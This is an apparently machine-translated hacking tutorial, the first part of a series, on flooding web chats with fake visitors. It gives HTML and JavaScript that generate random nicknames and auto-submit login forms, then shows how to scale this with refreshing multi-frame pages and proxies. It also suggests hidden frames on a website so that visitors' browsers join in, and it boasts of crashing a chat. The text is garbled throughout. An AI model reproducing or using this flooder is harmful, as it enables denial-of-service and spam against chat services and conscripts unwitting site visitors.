Anti-chat or nick flooding Part 1

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Continuing the theme of FA, we decided to write another article, which now exactly corresponds to its title. Attention: use this solely to combat the "frost-bitten" administrators who, from idleness or to show their abilities, are thrown out of the chat for any reason also without it. Do not use this tool in chat rooms, where you are alienated normally communicate, because You will not let anyone talk to you , because an impressive number of different "people" will enter the chat, and there will be so many that you can not express in the chat ... In other words, it is "Nick Flooding" or filling the chat with nonexistent visitors.

We save the start page to the disk.
To implement, you will need a chat with an entry without registration, as well as little knowledge of html (although what it is). We save the start page of the chat, this is where it says "Enter your nickname"

The code is about this

<Html> <body> ......................

<FORM action = /cgi-bin/chat/login.cgi method = post name = "chat_x" > - where the data is sent to
Enter your nickname: <input type = text name = Nick > - Here you enter a nickname
<INPUT name = color type = hidden value = red> - paint
<INPUT type = submit value = "Start !!!" > - button

..................... </ html> </ body>

And so it looks in the browser: Enter your nickname

If you have a start page loaded as frames, i.e. You can already see the message, at the bottom is written "Enter your nickname" (usually this is the lowest frame) you need to click there (below), right click also select "View as html" there you will also see that also in the main case, it is possible that the code will become more complicated.

If you are able to work with a chat from the disk, it is also possible in this chat, then the code of the bottom frame after the first said phrase will have the following:

<Html> <body> ......................

<FORM action = / cgi-bin / chat / login.cgi method = post name = "chat_x" > - where the data is sent to
<Input type = hidden name = Nick value = Your nickname> - Nickname (it can not be seen at all)
<INPUT name = color type = hidden value = red> - color
Enter the phrase <INPUT TYPE = TEXT name = say size = "24"> - the input field for the phrase
<INPUT type = submit value = "Saying !!!" >

..................... </ html> </ body>

If this chat is located at then in the line <FORM action = /cgi-bin/chat/login.cgi method = post name = " chat_x "> we register this address also: <FORM action = Http:// method = post name = "chat_x"> now run this file also we go from it to chat, name = " chat_x " may be absent, then Time is allowed to add it yourself. Instead of chat_x. It can also be referred to as a friend. If you can get into the chat from this file, go to the next items.

The first feature: generate "Visitors chat"

If we use one nickname for our purposes, then he will not stretch more than 2-3 phrases ... will be thrown out. So it is necessary that the nickname always always was different in this we will help Java script (you do not need to know it, just put your numbers) Math.floor (Math.random () * 100000000)

An example can be seen by clicking on the button:

Explanation: The mathematical object Math: Math.random () generates a number from 0 up to 1, then this number is rounded off with the help of Math.floor () and so that it should be multiplied by an integer such as 10, then a number from 0 up to 9, if multiplied by 100, then up to 99, if multiplied by 1000, then up to 999 also. those. The length of the resultant number, is less than or equal to the number of zeros, including the number multiplied by .... pancake, personally already confused Smile happy )) In the example (see below) this number is 100000000 Causing which we will get a random number, this will be a nickname ...
In order for this number to fit into the form for the nickname, put it in the page's startup, i.e. <Body onload = "document. Chat_x . Nick .value = (Math.floor (Math.random () * 1000000)) ">> pay attention to the name of the form (see sample html-code Above, it is highlighted in yellow), this is necessary in order for the random number to fit in the desired form also in the required field.

Another feature: Sending "visitors" to the chat.

<Script Language = "JavaScript">
Function submit () {
Timer = setTimeout ("(document. Chat_x .submit ())", 1000);
</ Script>

This script, as it were, "Presses" the "Submit" button and sends data from the form with the name chat_x, in the chat this button can be referred to as "Enter Chat" or "Say", it works with a delay of 1000 ms, so that you can first see (Later you can put 100), but then the data is automatically sent, but for this you need to register the function submit submit () to the startup page of our page. In the <body onload = "document.chat_x.nick.value = (Math.floor (Math.random () * 1000000)); submit () "> now, when the page is loaded, a random number is selected, then it is written to the chat_x form in The nick field. Also data from the chat_x form Sent to the server, it turns out that the chat went to people with a nickname in the form of several numbers.

An example of a html-code of a simple chat-flooder

<HTML> <HEAD> <TITLE> Chat Flooder </ TITLE>

<Script Language = "JavaScript">
Function submit () {
Timer = setTimeout ("(document. Chat_x .submit ())", 1000);
</ Script>

</ HEAD>
<BODY bgColor = # 000066 onload = "document. Chat_x . Nick .value = (Math.floor (Math.random () * 1000000)); submit ()">

<FORM action = http: // method = post name = " chat_x ">
<Input name = color type = hidden value = red>
Nick: <input name = nick type = text>
<INPUT type = submit value = " Start !!! ">
</ BODY> </ HTML>

The last ... personally flooding

To do this, eat three ways.

1.Create a file containing a frame pair, in one file, which when uploading creates a nickname also sends it to the chat, call it forma.htm, but in another frame any other file I have in the sample is yo.htm. And save it with the name frames.htm The code for this document will be:

The contents of the frames.htm file

<Html> <head> <title> Chat Flooder </ title> </ head>
<Frameset rows = "*, 100">
<Frame name = "main" src = " forma.htm ">
<Frame name = " send " src = " yo.htm ">
<Noframes> <body>
<P> This page uses frames, but your browser does not support them. </ P>
</ Body> </ noframes> </ frameset>

The name of the send frame was specially allocated, because The data will be sent to it so that the forma.htm file is not unloaded after the upload. Next, in the code forma.htm, add the following: in the <FORM action = ..... target = " send "> tag and in the source of the line: <meta http-equiv = "Refresh" content = "1"> so that the file itself Updated every second, and set Timer = 0. What happened: The file is updated also sends to the visitor's chat, it can be seen in the frame with the name SEND ie. Instead of the yo.htm file, a chat appears, then forma.htm is updated again, and again sends the newly-minted brow to the chat, it is again updated again, and again the chat goes new ... so down to infinity :) The refresh rate is based on the connection speed.

Example of the contents of the forma.htm file

<HEAD> <TITLE> Chat Flooder </ TITLE>
<Meta http-equiv = "Refresh" content = " 1 ">
<Script Language = "JavaScript">
Function submit () {
Timer = setTimeout ("(document. Chat_x .submit ())", 0 );
</ Script>

</ HEAD>
<BODY bgColor = # 000066 onload = "document. Chat_x . Nick .value = (Math.floor (Math.random () * 1000000)); submit ()">

<FORM action = http: // method = post name = " chat_x " target = " send ">
<Input name = color type = hidden value = red>
Nick: <input name = nick type = text>
<Input name = password type = hidden value = "">
<INPUT type = submit value = " Start !!! ">
</ BODY> </ HTML>

2 Method. First we make 4 files that will differ only in the delay when sending also one frame file in which there will be for example 16 (!) Frames, in the first four the first file, in it Timer = setTimeout ("(document.chat_x.submit ())", 1000 ); In the other four frames, the second file is loaded in which the delay is 10,000. In the third four, 30,000. But in the fourth four, the fourth file will be loaded with a delay of 40,000. Every 10,000 ms will be visited by 4 "people" and all different, though they will be in the form of numbers but this is garbage ... If you used the login form, all of them will "go" into the chat, but if the form of sending the message It is allowed to write another paragraph of the text as a message, at that time each generated nickname will begin to speak ... Experiment, try other variants with frames ...

It remains only to hide your IP, it is allowed to use A4Proxy , dial a large list of servers ....

3 Method. If you have a site to eat, then you are allowed to place these files on it, for example, in a hidden frame, while IP will always be different ...

Fetch chat :)

Chats using the system of private computers are so arranged that they are constantly "in touch" with the user's computer, i.e. Constantly generate for him the flow of messages, keep track of whether he has not disconnected yet, also if the users are doing a lot of things then the chat can not withstand the "fall". So, just now we were in a chat that can withstand a maximum of 70 individuals, then it just stops working, even if the start page is also loaded ... Put this chat "manually" was not difficult, it was necessary just to make a file which generates nicknames, sends them to Chat, a minute after the launch of this file, in the chat to the existing 23-m there was added about 50 people :) ) Also it drops (I used a file from a lot of frames, in which there was one also that blah blah file) And it should be noted that we were in the club but there was an impressive speed also powerful computers :) . Can also with the modem, too, it turns out (such as agreeing with someone also immediately to start), or first try it myself, I do not know ... Do not forget that the chat logs also the admins after that may appear wanting to see what it was like :) Now access from the IP-address of the Internet club "GeForce" in this chat is closed :)

FAQ: If it does not work out in any way

FlooDer : I can not do anything :)
Try first just to chat with the disk, i.e. From the stored form of the input, if everything turned out, then the error in the code "script-flooder" :) , If it did not work out, then read on ...

FlooDer : I came from the disk, now I can not send the data in any way :) What to act?
Check the correctness of the name of the forms (name = XxXxX)

FlooDer : In the line <FORM action = http: //www.***.ru/chat.cgi method = post> common no name = "XxXxX" , what to act?
Insert itself: (name = "chat_x" target = "send") target- so that the data is sent to the send frame, it works like this: <FORM action = http: //www.***.ru/chat.cgi method = post name = "Chat_x" target = "send ">

FlooDer: When entering the chat, you need to enter a password, it fits every if no nickname is registered in any way, how to write it into the code?
In the form for entering the password you need to add: value = "abrakadabra" then this password will be joined by all the generated "users"

Continuation >>>

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